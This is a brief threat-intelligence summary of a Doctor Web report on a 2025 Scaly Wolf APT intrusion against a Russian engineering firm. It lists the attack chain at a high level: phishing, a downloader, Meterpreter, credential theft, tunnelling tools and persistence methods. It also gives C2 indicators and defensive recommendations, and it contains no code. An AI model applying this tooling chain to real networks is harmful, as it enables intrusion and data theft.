Take 2: Scaly Wolf persistently targets Russian engineering company’s secrets

Doctor Web investigated a targeted May–June 2025 intrusion against a Russian engineering firm carried out by the Scaly Wolf APT: initial phishing with passworded ZIPs delivered Trojan.Updatar.1 (a downloader using RockYou-based obfuscation), which fetched Updatar modules and Meterpreter payloads; attackers performed credential theft (HandleKatz), lateral movement via RDP, deployed tunneling tools (Chisel, frp), and used BITS jobs and registry changes for persistence. The report details malware samples, C2 infrastructure (notably roscosmosmeet.online and 77.105.161.30), post-exploitation tooling, IoCs, and mapped MITRE ATT&CK techniques, and recommends tightening AV configuration and patching.